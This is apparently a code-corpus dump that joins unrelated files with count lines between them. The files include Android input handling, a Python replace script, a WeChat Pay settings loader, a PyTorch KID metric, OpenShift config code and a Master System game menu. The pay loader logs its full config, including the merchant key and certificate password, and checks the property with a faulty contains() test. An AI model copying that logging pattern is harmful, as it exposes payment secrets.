-event.getAxisValue(MotionEvent.AXIS_Y)); handleAxis(deviceId, PadButton.PadButtonRightStickX, event.getAxisValue(MotionEvent.AXIS_Z)); handleAxis(deviceId, PadButton.PadButtonRightStickY, -event.getAxisValue(MotionEvent.AXIS_RZ)); handleAxis(deviceId, PadButton.PadButtonAxis4, event.getAxisValue(MotionEvent.AXIS_LTRIGGER)); handleAxis(deviceId, PadButton.PadButtonAxis5, event.getAxisValue(MotionEvent.AXIS_RTRIGGER)); handleAxis(deviceId, PadButton.PadButtonLeft, event.getAxisValue(MotionEvent.AXIS_HAT_X)); handleAxis(deviceId, 
PadButton.PadButtonRight, event.getAxisValue(MotionEvent.AXIS_HAT_X)); handleAxis(deviceId, PadButton.PadButtonUp, event.getAxisValue(MotionEvent.AXIS_HAT_Y)); handleAxis(deviceId, PadButton.PadButtonDown, event.getAxisValue(MotionEvent.AXIS_HAT_Y)); return true; } return false; } private float getButtonState(KeyEvent event) { if (event.getAction() == KeyEvent.ACTION_DOWN) return 1.0f; return 0.0f; } private void handleButton(int deviceId, PadButton button, KeyEvent event) { float state = getButtonState(event); nativeOnInputBool(DeviceType.DT_PAD.ordinal(), deviceId, button.ordinal(), state != 0.0f); } public boolean handleKeyEvent(KeyEvent event) { int keyCode = event.getKeyCode(); int source = event.getSource(); if ((source & InputDevice.SOURCE_JOYSTICK) == InputDevice.SOURCE_JOYSTICK || (source & InputDevice.SOURCE_GAMEPAD) == InputDevice.SOURCE_GAMEPAD) { int deviceId = translateDeviceIdToIndex(event.getDeviceId()); if (keyCode == KeyEvent.KEYCODE_DPAD_UP) handleButton(deviceId, PadButton.PadButtonUp, event); else if (keyCode == KeyEvent.KEYCODE_DPAD_DOWN) handleButton(deviceId, PadButton.PadButtonDown, event); else if (keyCode == KeyEvent.KEYCODE_DPAD_LEFT) handleButton(deviceId, PadButton.PadButtonLeft, event); else if (keyCode == KeyEvent.KEYCODE_DPAD_RIGHT) handleButton(deviceId, PadButton.PadButtonRight, event); else if (keyCode == KeyEvent.KEYCODE_BUTTON_A) handleButton(deviceId, PadButton.PadButtonA, event); else if (keyCode == KeyEvent.KEYCODE_BUTTON_B) handleButton(deviceId, PadButton.PadButtonB, event); else if (keyCode == KeyEvent.KEYCODE_BUTTON_X) handleButton(deviceId, PadButton.PadButtonX, event); else if (keyCode == KeyEvent.KEYCODE_BUTTON_Y) handleButton(deviceId, PadButton.PadButtonY, event); else if (keyCode == KeyEvent.KEYCODE_BUTTON_L1) handleButton(deviceId, PadButton.PadButtonL1, event); else if (keyCode == KeyEvent.KEYCODE_BUTTON_R1) handleButton(deviceId, PadButton.PadButtonR1, event); else if (keyCode == KeyEvent.KEYCODE_BUTTON_THUMBL) handleButton(deviceId, PadButton.PadButtonL3, event); else if (keyCode == KeyEvent.KEYCODE_BUTTON_THUMBR) handleButton(deviceId, PadButton.PadButtonR3, event); else if (keyCode == KeyEvent.KEYCODE_BUTTON_SELECT) handleButton(deviceId, PadButton.PadButtonSelect, event); else if (keyCode == KeyEvent.KEYCODE_BUTTON_START) handleButton(deviceId, PadButton.PadButtonStart, event); else if (keyCode == KeyEvent.KEYCODE_HOME) handleButton(deviceId, PadButton.PadButtonHome, event); return true; } else if ((source & InputDevice.SOURCE_KEYBOARD) == InputDevice.SOURCE_KEYBOARD) { boolean down = event.getAction() == KeyEvent.ACTION_DOWN; nativeOnInputBool(DeviceType.DT_KEYBOARD.ordinal(), 0, event.getKeyCode(), down); if ((keyCode == KeyEvent.KEYCODE_VOLUME_DOWN) || (keyCode == KeyEvent.KEYCODE_VOLUME_UP)) { return false; } else { return true; } } return false; } public boolean handleTouchEvent(MotionEvent event) { try { final int action = event.getAction() & MotionEvent.ACTION_MASK; final int numberOfPointers = event.getPointerCount(); switch (action) { case MotionEvent.ACTION_DOWN: case MotionEvent.ACTION_POINTER_DOWN: { for (int i = 0; i < numberOfPointers; ++i) { final int pointerId = event.getPointerId(i); final float x_move = getRealX(event.getX(i)); final float y_move = getRealY(event.getY(i)); nativeOnInputBool(DeviceType.DT_TOUCH.ordinal(), 0, 0 + 4 * pointerId, true); nativeOnInputFloat(DeviceType.DT_TOUCH.ordinal(), 0, 1 + 4 * pointerId, x_move); nativeOnInputFloat(DeviceType.DT_TOUCH.ordinal(), 0, 2 + 4 * pointerId, y_move); } 
break; } case MotionEvent.ACTION_MOVE: { for (int i = 0; i < numberOfPointers; ++i) { final int pointerId = event.getPointerId(i); final float x_move = getRealX(event.getX(i)); final float y_move = getRealY(event.getY(i)); nativeOnInputFloat(DeviceType.DT_TOUCH.ordinal(), 0, 1 + 4 * pointerId, x_move); nativeOnInputFloat(DeviceType.DT_TOUCH.ordinal(), 0, 2 + 4 * pointerId, y_move); } break; } case MotionEvent.ACTION_POINTER_UP: case MotionEvent.ACTION_UP: { for (int i = 0; i < numberOfPointers; ++i) { final int pointerId = event.getPointerId(i); final float x_move = getRealX(event.getX(i)); final float y_move = getRealY(event.getY(i)); nativeOnInputBool(DeviceType.DT_TOUCH.ordinal(), 0, 0 + 4 * pointerId, false); nativeOnInputFloat(DeviceType.DT_TOUCH.ordinal(), 0, 1 + 4 * pointerId, x_move); nativeOnInputFloat(DeviceType.DT_TOUCH.ordinal(), 0, 2 + 4 * pointerId, y_move); } break; } } return true; } catch (final Exception ex) { ex.printStackTrace(); return false; } } }
4,540
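The Gainput record above assigns each Android input device the lowest unused slot index and releases the slot when the device is removed. The snippet below is only an illustrative Python restatement of that allocation policy; the class and method names are mine, not from the record.

# Illustrative sketch (not from the record): stable slot assignment by lowest unused index.
class SlotMap:
    def __init__(self):
        self.slots = {}  # device_id -> slot index

    def acquire(self, device_id):
        if device_id in self.slots:
            return self.slots[device_id]
        used = set(self.slots.values())
        # Among indices 0..len(used) at least one is free, so next() always succeeds.
        index = next(i for i in range(len(used) + 1) if i not in used)
        self.slots[device_id] = index
        return index

    def release(self, device_id):
        return self.slots.pop(device_id, None)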
5,169
<reponame>Gantios/Specs
{
  "name": "CometDClient",
  "version": "1.0.0",
  "summary": "Swift client for CometD",
  "description": "CometD is a scalable web event routing bus that allows you to write low-latency, server-side, event-driven web applications. Typical examples of such applications are stock trading applications, web chat applications, online games, and monitoring consoles.",
  "homepage": "https://cometd.org/",
  "license": "MIT",
  "authors": {
    "<NAME>": "<EMAIL>"
  },
  "platforms": {
    "ios": "10.0"
  },
  "source": {
    "git": "https://github.com/Insurlytech/CometDClient-iOS.git",
    "tag": "1.0.0"
  },
  "source_files": "Sources/**/*.swift",
  "exclude_files": "Classes/Exclude",
  "swift_versions": "5.2",
  "frameworks": "Foundation",
  "requires_arc": true,
  "dependencies": {
    "Starscream": [
      "4.0.3"
    ],
    "SwiftyJSON": [
      "~> 5.0"
    ],
    "XCGLogger": [
      "~> 7.0.1"
    ]
  },
  "swift_version": "5.2"
}
399
1,534
{ "version": { "message": "Versión" }, "definitionsVersion": { "message": "Omitir definiziónes" }, "changelog": { "message": "Rechistro de cambio." } }
78
2,023
#!/usr/bin/env python
import os, sys

usage = "usage: %s search_text replace_text [infile [outfile]]" % os.path.basename(sys.argv[0])

if len(sys.argv) < 3:
    print usage
else:
    stext = sys.argv[1]
    rtext = sys.argv[2]
    input = sys.stdin
    output = sys.stdout
    if len(sys.argv) > 3:
        input = open(sys.argv[3])
    if len(sys.argv) > 4:
        output = open(sys.argv[4], 'w')
    for s in input.xreadlines():
        output.write(s.replace(stext, rtext))

# For older versions of Python (1.5.2 and earlier) import
# the string module and replace the last two lines with:
#
# for s in input.readlines():
#     output.write(string.replace(s, stext, rtext))
305
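For comparison, a minimal Python 3 sketch of the same stream search-and-replace filter follows; it is an illustration written for this dump, not part of the original record, and the main() structure is my own choice.

#!/usr/bin/env python3
# Illustrative sketch (not from the record): stream-based search/replace, Python 3 idiom.
import os
import sys


def main() -> int:
    usage = "usage: %s search_text replace_text [infile [outfile]]" % os.path.basename(sys.argv[0])
    if len(sys.argv) < 3:
        print(usage)
        return 1
    stext, rtext = sys.argv[1], sys.argv[2]
    infile = open(sys.argv[3]) if len(sys.argv) > 3 else sys.stdin
    outfile = open(sys.argv[4], "w") if len(sys.argv) > 4 else sys.stdout
    # Process line by line so arbitrarily large inputs stay cheap on memory.
    for line in infile:
        outfile.write(line.replace(stext, rtext))
    return 0


if __name__ == "__main__":
    sys.exit(main())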
1,088
package com.riversoft.weixin.pay.base; import com.riversoft.weixin.common.exception.WxRuntimeException; import com.riversoft.weixin.common.util.XmlObjectMapper; import org.apache.commons.io.IOUtils; import org.slf4j.Logger; import org.slf4j.LoggerFactory; import java.io.IOException; import java.io.InputStream; /** * 商户信息 * * Created by exizhai on 11/22/2015. */ public class PaySetting { private static Logger logger = LoggerFactory.getLogger(PaySetting.class); private static PaySetting paySetting = null; public static void setDefault(PaySetting paySetting) { PaySetting.paySetting = paySetting; } public static PaySetting defaultSetting() { if (paySetting == null) { loadFromSystemProperties(); } if (paySetting == null) { loadFromClasspath(); } if (paySetting == null) { throw new WxRuntimeException(999, "当前系统没有设置缺省的商户信息,请使用setDefault方法或者在classpath下面创建wx-pay-settings.xml文件."); } return paySetting; } private static void loadFromSystemProperties() { if(System.getProperties().contains("payconfig")) { logger.info("loading pay configuration from system properties..."); String xml = System.getProperties().getProperty("payconfig", ""); logger.info("payconfig: {}", xml); if(xml == null || "".equals(xml)) { return; } else { try { PaySetting setting = XmlObjectMapper.defaultMapper().fromXml(xml, PaySetting.class); paySetting = setting; } catch (IOException e) { } } } } private static void loadFromClasspath() { try { InputStream inputStream = Thread.currentThread().getContextClassLoader().getResourceAsStream("wx-pay-settings-test.xml"); if (inputStream == null) { inputStream = Thread.currentThread().getContextClassLoader().getResourceAsStream("wx-pay-settings.xml"); } if (inputStream != null) { String xml = IOUtils.toString(inputStream); PaySetting setting = XmlObjectMapper.defaultMapper().fromXml(xml, PaySetting.class); paySetting = setting; } } catch (IOException e) { logger.error("read settings from wx-pay-settings-test.xml or wx-pay-settings.xml failed:", e); } } /** * 商户ID */ private String mchId; /** * 商户的appId */ private String appId; /** * 秘钥 */ private String key; /** * 证书位置 */ private String certPath; /** * 证书密码 */ private String certPassword; public String getMchId() { return mchId; } public void setMchId(String mchId) { this.mchId = mchId; } public String getAppId() { return appId; } public void setAppId(String appId) { this.appId = appId; } public String getKey() { return key; } public void setKey(String key) { this.key = key; } public String getCertPath() { return certPath; } public void setCertPath(String certPath) { this.certPath = certPath; } public String getCertPassword() { return certPassword; } public void setCertPassword(String certPassword) { this.certPassword = certPassword; } @Override public boolean equals(Object o) { if (this == o) return true; if (o == null || getClass() != o.getClass()) return false; PaySetting that = (PaySetting) o; if (!mchId.equals(that.mchId)) return false; return !(appId != null ? !appId.equals(that.appId) : that.appId != null); } @Override public int hashCode() { int result = mchId.hashCode(); result = 31 * result + (appId != null ? appId.hashCode() : 0); return result; } }
2,045
471
from typing import Optional, Tuple, Union import torch from piq.base import BaseFeatureMetric from piq.utils import _validate_input def _polynomial_kernel(X: torch.Tensor, Y: torch.Tensor = None, degree: int = 3, gamma: Optional[float] = None, coef0: float = 1.) -> torch.Tensor: """ Compute the polynomial kernel between x and y K(X, Y) = (gamma <X, Y> + coef0)^degree Args: X: Tensor with shape (n_samples_1, n_features) Y: torch.Tensor of shape (n_samples_2, n_features) degree: default 3 gamma: if None, defaults to 1.0 / n_features. coef0 : default 1 Returns: Gram matrix : Array with shape (n_samples_1, n_samples_2) Reference: https://scikit-learn.org/stable/modules/generated/sklearn.metrics.pairwise.polynomial_kernel.html """ if Y is None: Y = X if X.dim() != 2 or Y.dim() != 2: raise ValueError('Incompatible dimension for X and Y matrices: ' 'X.dim() == {} while Y.dim() == {}'.format(X.dim(), Y.dim())) if X.size(1) != Y.size(1): raise ValueError('Incompatible dimension for X and Y matrices: ' 'X.size(1) == {} while Y.size(1) == {}'.format(X.size(1), Y.size(1))) if gamma is None: gamma = 1.0 / X.size(1) K = torch.mm(X, Y.T) K *= gamma K += coef0 K.pow_(degree) return K def _mmd2_and_variance(K_XX: torch.Tensor, K_XY: torch.Tensor, K_YY: torch.Tensor, unit_diagonal: bool = False, mmd_est: str = 'unbiased', var_at_m: Optional[int] = None, ret_var: bool = False) \ -> Union[torch.Tensor, Tuple[torch.Tensor, torch.Tensor]]: # based on # https://github.com/dougalsutherland/opt-mmd/blob/master/two_sample/mmd.py # but changed to not compute the full kernel matrix at once m = K_XX.size(0) assert K_XX.size() == (m, m) assert K_XY.size() == (m, m) assert K_YY.size() == (m, m) if var_at_m is None: var_at_m = m # Get the various sums of kernels that we'll use # Kts drop the diagonal, but we don't need to compute them explicitly if unit_diagonal: diag_X = diag_Y = 1 sum_diag_X = sum_diag_Y = m sum_diag2_X = sum_diag2_Y = m else: diag_X = torch.diagonal(K_XX) diag_Y = torch.diagonal(K_YY) sum_diag_X = torch.sum(diag_X) sum_diag_Y = torch.sum(diag_Y) sum_diag2_X = _sqn(diag_X) sum_diag2_Y = _sqn(diag_Y) Kt_XX_sums = K_XX.sum(dim=1) - diag_X Kt_YY_sums = K_YY.sum(dim=1) - diag_Y K_XY_sums_0 = K_XY.sum(dim=0) K_XY_sums_1 = K_XY.sum(dim=1) Kt_XX_sum = Kt_XX_sums.sum() Kt_YY_sum = Kt_YY_sums.sum() K_XY_sum = K_XY_sums_0.sum() if mmd_est == 'biased': mmd2 = ((Kt_XX_sum + sum_diag_X) / (m * m) + (Kt_YY_sum + sum_diag_Y) / (m * m) - 2 * K_XY_sum / (m * m)) else: assert mmd_est in {'unbiased', 'u-statistic'} mmd2 = (Kt_XX_sum + Kt_YY_sum) / (m * (m - 1)) if mmd_est == 'unbiased': mmd2 -= 2 * K_XY_sum / (m * m) else: mmd2 -= 2 * (K_XY_sum - torch.trace(K_XY)) / (m * (m - 1)) if not ret_var: return mmd2 Kt_XX_2_sum = _sqn(K_XX) - sum_diag2_X Kt_YY_2_sum = _sqn(K_YY) - sum_diag2_Y K_XY_2_sum = _sqn(K_XY) dot_XX_XY = Kt_XX_sums.dot(K_XY_sums_1) dot_YY_YX = Kt_YY_sums.dot(K_XY_sums_0) m1 = m - 1 m2 = m - 2 zeta1_est = ( 1 / (m * m1 * m2) * (_sqn(Kt_XX_sums) - Kt_XX_2_sum + _sqn(Kt_YY_sums) - Kt_YY_2_sum) - 1 / (m * m1) ** 2 * (Kt_XX_sum ** 2 + Kt_YY_sum ** 2) + 1 / (m * m * m1) * ( _sqn(K_XY_sums_1) + _sqn(K_XY_sums_0) - 2 * K_XY_2_sum) - 2 / m ** 4 * K_XY_sum ** 2 - 2 / (m * m * m1) * (dot_XX_XY + dot_YY_YX) + 2 / (m ** 3 * m1) * (Kt_XX_sum + Kt_YY_sum) * K_XY_sum ) zeta2_est = ( 1 / (m * m1) * (Kt_XX_2_sum + Kt_YY_2_sum) - 1 / (m * m1) ** 2 * (Kt_XX_sum ** 2 + Kt_YY_sum ** 2) + 2 / (m * m) * K_XY_2_sum - 2 / m ** 4 * K_XY_sum ** 2 - 4 / (m * m * m1) * (dot_XX_XY + dot_YY_YX) + 4 / (m ** 3 * m1) * (Kt_XX_sum + 
Kt_YY_sum) * K_XY_sum ) var_est = (4 * (var_at_m - 2) / (var_at_m * (var_at_m - 1)) * zeta1_est + 2 / (var_at_m * (var_at_m - 1)) * zeta2_est) return mmd2, var_est def _sqn(tensor: torch.Tensor) -> torch.Tensor: flat = tensor.flatten() return flat.dot(flat) class KID(BaseFeatureMetric): r"""Interface of Kernel Inception Distance. It's computed for a whole set of data and uses features from encoder instead of images itself to decrease computation cost. KID can compare two data distributions with different number of samples. But dimensionalities should match, otherwise it won't be possible to correctly compute statistics. Args: degree: Degree of a polynomial functions used in kernels. Default: 3 gamma: Kernel parameter. See paper for details coef0: Kernel parameter. See paper for details var_at_m: Kernel variance. Default is `None` average: If `True` recomputes metric `n_subsets` times using `subset_size` elements. n_subsets: Number of repeats. Ignored if `average` is False subset_size: Size of each subset for repeat. Ignored if `average` is False ret_var: Whether to return variance after the distance is computed. This function will return ``Tuple[torch.Tensor, torch.Tensor]`` in this case. Default: False Examples: >>> kid_metric = KID() >>> x_feats = torch.rand(10000, 1024) >>> y_feats = torch.rand(10000, 1024) >>> kid: torch.Tensor = kid_metric(x_feats, y_feats) References: Demystifying MMD GANs https://arxiv.org/abs/1801.01401 """ def __init__(self, degree: int = 3, gamma: Optional[float] = None, coef0: int = 1, var_at_m: Optional[int] = None, average: bool = False, n_subsets: int = 50, subset_size: Optional[int] = 1000, ret_var: bool = False ) -> None: super().__init__() self.degree = degree self.gamma = gamma self.coef0 = coef0 self.ret_var = ret_var if average: self.n_subsets = n_subsets self.subset_size = subset_size else: self.n_subsets = 1 self.subset_size = None def compute_metric(self, x_features: torch.Tensor, y_features: torch.Tensor) \ -> Union[torch.Tensor, Tuple[torch.Tensor, torch.Tensor]]: """Computes KID (polynomial MMD) for given sets of features, obtained from Inception net or any other feature extractor. Samples must be in range [0, 1]. Args: x_features: Samples from data distribution. Shape :math:`(N_x, D)` y_features: Samples from data distribution. Shape :math:`(N_y, D)` Returns: KID score and variance (optional). """ _validate_input([x_features, y_features], dim_range=(2, 2), size_range=(1, 2)) var_at_m = min(x_features.size(0), y_features.size(0)) if self.subset_size is None: subset_size = x_features.size(0) else: subset_size = self.subset_size results = [] for _ in range(self.n_subsets): x_subset = x_features[torch.randperm(len(x_features))[:subset_size]] y_subset = y_features[torch.randperm(len(y_features))[:subset_size]] # use k(x, y) = (gamma <x, y> + coef0)^degree # default gamma is 1 / dim K_XX = _polynomial_kernel( x_subset, None, degree=self.degree, gamma=self.gamma, coef0=self.coef0) K_YY = _polynomial_kernel( y_subset, None, degree=self.degree, gamma=self.gamma, coef0=self.coef0) K_XY = _polynomial_kernel( x_subset, y_subset, degree=self.degree, gamma=self.gamma, coef0=self.coef0) out = _mmd2_and_variance(K_XX, K_XY, K_YY, var_at_m=var_at_m, ret_var=self.ret_var) results.append(out) if self.ret_var: score = torch.mean(torch.stack([p[0] for p in results], dim=0)) variance = torch.mean(torch.stack([p[1] for p in results], dim=0)) return (score, variance) else: score = torch.mean(torch.stack(results, dim=0)) return score
4,457
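A short usage sketch for the KID class defined in the record above, assuming the piq package it belongs to is installed and exports KID; the feature tensors are random stand-ins rather than real Inception features, and the subset sizes are arbitrary.

# Illustrative sketch: averaged KID over random subsets, also returning the variance.
import torch
from piq import KID  # assumes the piq package from the record above is available

x_feats = torch.rand(5000, 1024)  # placeholder "real" features
y_feats = torch.rand(5000, 1024)  # placeholder "generated" features

kid_metric = KID(average=True, n_subsets=20, subset_size=500, ret_var=True)
score, variance = kid_metric(x_feats, y_feats)
print(float(score), float(variance))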
349
/*********************************************************************************
 *
 * Inviwo - Interactive Visualization Workshop
 *
 * Copyright (c) 2020-2021 Inviwo Foundation
 * All rights reserved.
 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that the following conditions are met:
 *
 * 1. Redistributions of source code must retain the above copyright notice, this
 *    list of conditions and the following disclaimer.
 * 2. Redistributions in binary form must reproduce the above copyright notice,
 *    this list of conditions and the following disclaimer in the documentation
 *    and/or other materials provided with the distribution.
 *
 * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
 * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
 * WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
 * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
 * ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
 * (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
 * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
 * ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
 * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
 * SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
 *
 *********************************************************************************/

#include <modules/basegl/datastructures/stipplingsettings.h>

namespace inviwo {

StipplingSettings::StipplingSettings(const StipplingSettingsInterface* other)
    : mode(other->getMode())
    , length(other->getLength())
    , spacing(other->getSpacing())
    , offset(other->getOffset())
    , worldScale(other->getWorldScale()) {}

StipplingSettingsInterface::Mode StipplingSettings::getMode() const { return mode; }

float StipplingSettings::getLength() const { return length; }

float StipplingSettings::getSpacing() const { return spacing; }

float StipplingSettings::getOffset() const { return offset; }

float StipplingSettings::getWorldScale() const { return worldScale; }

}  // namespace inviwo
643
333
<gh_stars>100-1000 /** * Copyright 2016 Red Hat, Inc. * * Red Hat licenses this file to you under the Apache License, version * 2.0 (the "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or * implied. See the License for the specific language governing * permissions and limitations under the License. */ package io.fabric8.maven.core.handler; import java.util.HashMap; import java.util.List; import java.util.Map; import java.util.Objects; import io.fabric8.kubernetes.api.model.Container; import io.fabric8.kubernetes.api.model.ObjectMeta; import io.fabric8.kubernetes.api.model.ObjectMetaBuilder; import io.fabric8.kubernetes.api.model.PodSpec; import io.fabric8.kubernetes.api.model.PodTemplateSpec; import io.fabric8.maven.core.config.ResourceConfig; import io.fabric8.maven.core.util.kubernetes.KubernetesHelper; import io.fabric8.maven.docker.config.ImageConfiguration; import io.fabric8.maven.docker.util.ImageName; import io.fabric8.openshift.api.model.DeploymentConfig; import io.fabric8.openshift.api.model.DeploymentConfigBuilder; import io.fabric8.openshift.api.model.DeploymentConfigSpec; import io.fabric8.openshift.api.model.DeploymentConfigSpecBuilder; public class DeploymentConfigHandler { private final PodTemplateHandler podTemplateHandler; DeploymentConfigHandler(PodTemplateHandler podTemplateHandler) { this.podTemplateHandler = podTemplateHandler; } public DeploymentConfig getDeploymentConfig(ResourceConfig config, List<ImageConfiguration> images, Long openshiftDeployTimeoutSeconds, Boolean imageChangeTrigger, Boolean enableAutomaticTrigger, Boolean isOpenshiftBuildStrategy, List<String> generatedContainers) { DeploymentConfig deploymentConfig = new DeploymentConfigBuilder() .withMetadata(createDeploymentConfigMetaData(config)) .withSpec(createDeploymentConfigSpec(config, images, openshiftDeployTimeoutSeconds, imageChangeTrigger, enableAutomaticTrigger, isOpenshiftBuildStrategy, generatedContainers)) .build(); return deploymentConfig; } // =========================================================== private ObjectMeta createDeploymentConfigMetaData(ResourceConfig config) { return new ObjectMetaBuilder() .withName(KubernetesHelper.validateKubernetesId(config.getControllerName(), "controller name")) .build(); } private DeploymentConfigSpec createDeploymentConfigSpec(ResourceConfig config, List<ImageConfiguration> images, Long openshiftDeployTimeoutSeconds, Boolean imageChangeTrigger, Boolean enableAutomaticTrigger, Boolean isOpenshiftBuildStrategy, List<String> generatedContainers) { DeploymentConfigSpecBuilder specBuilder = new DeploymentConfigSpecBuilder(); PodTemplateSpec podTemplateSpec = podTemplateHandler.getPodTemplate(config,images); specBuilder.withReplicas(config.getReplicas()) .withTemplate(podTemplateSpec) .addNewTrigger().withType("ConfigChange").endTrigger(); if (openshiftDeployTimeoutSeconds != null && openshiftDeployTimeoutSeconds > 0) { specBuilder.withNewStrategy().withType("Rolling"). 
withNewRollingParams().withTimeoutSeconds(openshiftDeployTimeoutSeconds).endRollingParams().endStrategy(); } return specBuilder.build(); } private void validateContainer(Container container) { if (container.getImage() == null) { throw new IllegalArgumentException("Container " + container.getName() + " has no Docker image configured. " + "Please check your Docker image configuration (including the generators which are supposed to run)"); } } }
1,351
3,301
package com.alibaba.alink.params.feature;

import com.alibaba.alink.params.dataproc.HasHandleInvalid;
import com.alibaba.alink.params.mapper.ModelMapperParams;
import com.alibaba.alink.params.shared.colname.HasOutputColsDefaultAsNull;
import com.alibaba.alink.params.shared.colname.HasReservedColsDefaultAsNull;
import com.alibaba.alink.params.shared.colname.HasSelectedCols;

/**
 * parameters of one hot predictor.
 */
public interface OneHotPredictParams<T> extends
    ModelMapperParams<T>,
    HasSelectedCols<T>,
    HasReservedColsDefaultAsNull<T>,
    HasOutputColsDefaultAsNull<T>,
    HasHandleInvalid<T>,
    HasEncodeWithoutWoe<T>,
    HasDropLast<T> {
}
231
392
<gh_stars>100-1000 package com.luminous.pick.Adapter; import android.content.Context; import android.support.v7.widget.RecyclerView; import android.view.LayoutInflater; import android.view.View; import android.view.ViewGroup; import android.widget.ImageView; import com.luminous.pick.CustomGallery; import com.luminous.pick.R; import com.nostra13.universalimageloader.core.DisplayImageOptions; import com.nostra13.universalimageloader.core.ImageLoader; import com.nostra13.universalimageloader.core.ImageLoaderConfiguration; import com.nostra13.universalimageloader.core.listener.SimpleImageLoadingListener; import java.util.ArrayList; import butterknife.BindView; import butterknife.ButterKnife; /** * Created by <NAME> (<NAME>) on 06-Jul-18. */ public class ImageListRecyclerAdapter extends RecyclerView.Adapter<ImageListRecyclerAdapter.VerticalItemHolder> { private final Context mContext; private final ImageLoader imageLoader; private final DisplayImageOptions imageOptions; public ArrayList<CustomGallery> mItems = new ArrayList<>(); private boolean isActionMultiplePick; public EventListener mEventListener; // private AdapterView.OnItemClickListener mOnItemClickListener; public ImageListRecyclerAdapter(Context mContext) { this.mContext = mContext; imageLoader = ImageLoader.getInstance(); ImageLoaderConfiguration config = new ImageLoaderConfiguration.Builder( mContext).build(); imageLoader.init(config); imageOptions = new DisplayImageOptions.Builder() .cacheInMemory(true) .showImageOnLoading(R.drawable.no_media) .showImageForEmptyUri(R.drawable.no_media) .showImageOnFail(R.drawable.no_media) .build(); } public boolean isMultiSelected() { return isActionMultiplePick; } public interface EventListener { public void onItemClickListener(int position, VerticalItemHolder v); } public ArrayList<CustomGallery> getSelected() { ArrayList<CustomGallery> dataT = new ArrayList<CustomGallery>(); for (int i = 0; i < mItems.size(); i++) { if (mItems.get(i).isSeleted) { dataT.add(mItems.get(i)); } } return dataT; } public void addAll(ArrayList<CustomGallery> files) { try { this.mItems.clear(); this.mItems.addAll(files); } catch (Exception e) { e.printStackTrace(); } notifyDataSetChanged(); } public void changeSelection(VerticalItemHolder v, int position) { if (mItems.get(position).isSeleted) { mItems.get(position).isSeleted = false; } else { mItems.get(position).isSeleted = true; } v.imgQueueMultiSelected.setSelected(mItems.get(position).isSeleted); //((ImageListRecyclerAdapter.VerticalItemHolder) v.getTag()).imgQueueMultiSelected.setSelected(mItems.get(position).isSeleted); } public void clear() { mItems.clear(); notifyDataSetChanged(); } public void setMultiplePick(boolean isMultiplePick) { this.isActionMultiplePick = isMultiplePick; } @Override public VerticalItemHolder onCreateViewHolder(ViewGroup container, int viewType) { LayoutInflater inflater = LayoutInflater.from(container.getContext()); View root = inflater.inflate(R.layout.gallery_item, container, false); return new VerticalItemHolder(root, this); } @Override public void onBindViewHolder(final VerticalItemHolder holder, final int position) { CustomGallery item = mItems.get(position); // imageLoader.displayImage(item.sdcardPath, holder.imgQueue); holder.setImage(item.sdcardPath); if (isActionMultiplePick) { holder.imgQueueMultiSelected.setVisibility(View.VISIBLE); } else { holder.imgQueueMultiSelected.setVisibility(View.GONE); } if (isActionMultiplePick) { holder.imgQueueMultiSelected .setSelected(item.isSeleted); } holder.container.setOnClickListener(new 
View.OnClickListener() { @Override public void onClick(View view) { if (mEventListener != null) { mEventListener.onItemClickListener(position, holder); } } }); } @Override public int getItemCount() { return mItems.size(); } public CustomGallery getItem(int position) { return mItems.get(position); } public class VerticalItemHolder extends RecyclerView.ViewHolder { @BindView(R.id.imgQueue) ImageView imgQueue; @BindView(R.id.imgQueueMultiSelected) ImageView imgQueueMultiSelected; @BindView(R.id.container) View container; public VerticalItemHolder(View itemView, ImageListRecyclerAdapter adapter) { super(itemView); ButterKnife.bind(this, itemView); } public void setImage(String url) { imageLoader.displayImage("file://" + url, imgQueue, new SimpleImageLoadingListener() { @Override public void onLoadingStarted(String imageUri, View view) { imgQueue .setImageResource(R.drawable.no_media); super.onLoadingStarted(imageUri, view); } }); } } public void setEventListner(EventListener eventListner) { mEventListener = eventListner; } }
2,446
640
<filename>libsrc/_DEVELOPMENT/EXAMPLES/sms/MoggyMaster/src/menu.h<gh_stars>100-1000 #define LAST_CHOICE 1 unsigned char menu (void) { // Set palettes SMS_loadBGPalette (palette_2); // Load patterns for tiles. TITLE_NPATTERNS tiles, 32 bytes per tile. SMS_loadTiles (title_patterns, 0, TITLE_NPATTERNS * 32); // Directly copy nametable to VRAM, FULL 1536 bytes SMS_loadTileMap (0, 0, title_nametable, 1534); // Last tile is a black square. I won't be copying it SMS_setTileatXY (31, 23, 0x1000 + 0); // So I print a blank by hand. // Turn screen on SMS_displayOn (); // Murcia stuff PSGPlay (m_title [tv_system]); while (1) { // Move sprite cursor gpint = SMS_getKeysStatus (); // Silly, but maybe someday there's more than 1 option if ((gpint & PORT_A_KEY_UP) || (gpint & PORT_B_KEY_UP)) if (menu_choice) { menu_choice --; PSGSFXPlay (s_select [tv_system], SFX_CHANNEL2); } if ((gpint & PORT_A_KEY_DOWN) || (gpint & PORT_B_KEY_DOWN)) if (menu_choice < LAST_CHOICE) { menu_choice ++; PSGSFXPlay (s_select [tv_system], SFX_CHANNEL2); } if ((gpint & PORT_A_KEY_1) || (gpint & PORT_B_KEY_1)) { PSGSFXPlay (s_select [tv_system], SFX_CHANNEL2); break; } // Sprite to highlight menu choice SMS_initSprites (); SMS_addSprite (72, (menu_choice << 4) + 112, 0); 